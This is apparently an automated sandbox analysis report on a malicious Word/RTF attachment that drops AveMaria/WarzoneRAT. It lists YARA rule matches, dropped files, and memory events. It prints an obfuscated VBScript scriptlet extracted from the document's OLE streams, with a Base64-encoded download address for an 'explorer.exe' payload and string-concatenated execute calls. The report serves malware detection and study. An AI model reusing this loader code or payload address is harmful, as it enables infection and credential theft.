Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown

Document contains OLE streams with names of living off the land binaries

Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr	Stream path '_1725425945/\x1Ole10Native' : :....DZdtfhgYgeghD{.scT.C:\osdsTggH\DZdtfhgYgeghD{.scT..... ...C:\9jkepaD\DZdtfhgYgeghD{.scT.s....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"").C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987235:execute sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987234:execute(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987236:execute sn556.... age64Procode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....function BytesToStr(ByVal byteArray, ByVal xtexenc).. lfkfdiooie = "utf".. lfkfdiooie = lfkfdiooie + "-16le".. If LCase(xtexenc) = lfkfdiooie then.. ' UTF-16 LE happens to be VBScript's internal encoding, so we can.. ' take a shortcut and use CStr() to directly convert the byte array.. ' to a string... knrudogh = "BytesToStr = CStr(byteArray)".. var1 = knrudogh.. sn556 = "ex" + "ec" + "ute" + "(var1)".. kjkxvlsvllf=0:execute sn556.. Else ' Convert the specified text encoding to a VBScript string... ' Create a binary stream and copy the input byte array to it... vgct783hth = "bj".. vgct783hth = vgct783hth + "ect".. piiing = "CreateO" + vgct783hth.. ldiwuywfj = "Set ".. lsvosfouwoupwiot = ldiwuywfj + "baax = " + piiing + "(aaax)".... var1 = lsvosfouwoupwiot.. sn556 = "ex" + "ecute(var1)"..
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr	Stream path '_1725426018/\x1Ole10Native' : ;....DZdtfhgYgeghD{.scT.C:\osdsTggH\DZdtfhgYgeghD{.scT.....6...C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{.scT.w:....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"").C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987235:execute sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987234:execute(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987236:execute sn556.... age64Procode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....function BytesToStr(ByVal byteArray, ByVal xtexenc).. lfkfdiooie = "utf".. lfkfdiooie = lfkfdiooie + "-16le".. If LCase(xtexenc) = lfkfdiooie then.. ' UTF-16 LE happens to be VBScript's internal encoding, so we can.. ' take a shortcut and use CStr() to directly convert the byte array.. ' to a string... knrudogh = "BytesToStr = CStr(byteArray)".. var1 = knrudogh.. sn556 = "ex" + "ec" + "ute" + "(var1)".. kjkxvlsvllf=0:execute sn556.. Else ' Convert the specified text encoding to a VBScript string... ' Create a binary stream and copy the input byte array to it... vgct783hth = "bj".. vgct783hth = vgct783hth + "ect".. piiing = "CreateO" + vgct783hth.. ldiwuywfj = "Set ".. lsvosfouwoupwiot = ldiwuywfj + "baax = " + piiing + "(aaax)".... var1 = lsvosfouwoupwiot.. sn556 = "e

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\explorer.exe

Jump to dropped file

Microsoft Office creates scripting files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT			Jump to behavior

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe

Jump to dropped file

Found suspicious RTF objects

Source: DZdtfhgYgeghD{.scT

Static RTF information: Object: 0 Offset: 000007D1h DZdtfhgYgeghD{.scT

Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 8_2_001900C8	8_2_001900C8
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 8_2_00197650	8_2_00197650
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 8_2_00197219	8_2_00197219
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 8_2_00197228	8_2_00197228
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 8_2_00197640	8_2_00197640
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 8_2_001907EE	8_2_001907EE
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 8_2_0131A760	8_2_0131A760
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 8_2_01310048	8_2_01310048
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 8_2_05890048	8_2_05890048
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_002B00C8	20_2_002B00C8
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_002B7650	20_2_002B7650
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_002B7228	20_2_002B7228
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_002B7219	20_2_002B7219
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_002B7640	20_2_002B7640
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_002B07E0	20_2_002B07E0
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_04E09850	20_2_04E09850
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_04E00042	20_2_04E00042
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_04E00048	20_2_04E00048
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_05F00048	20_2_05F00048
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 20_2_05F00038	20_2_05F00038
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 29_2_001F00C8	29_2_001F00C8
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 29_2_001F7650	29_2_001F7650
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 29_2_001F7219	29_2_001F7219
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 29_2_001F7228	29_2_001F7228
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 29_2_001F07E0	29_2_001F07E0
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 29_2_01329850	29_2_01329850
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 29_2_01320048	29_2_01320048
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 29_2_05500048	29_2_05500048
Source: C:\Users\user\AppData\Roaming\explorer.exe	Code function: 29_2_05500006	29_2_05500006

Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: explorer[1].exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: explorer.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eDdYRRbouy.exe.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 77740000 page execute and read and write

Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLE	Matched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
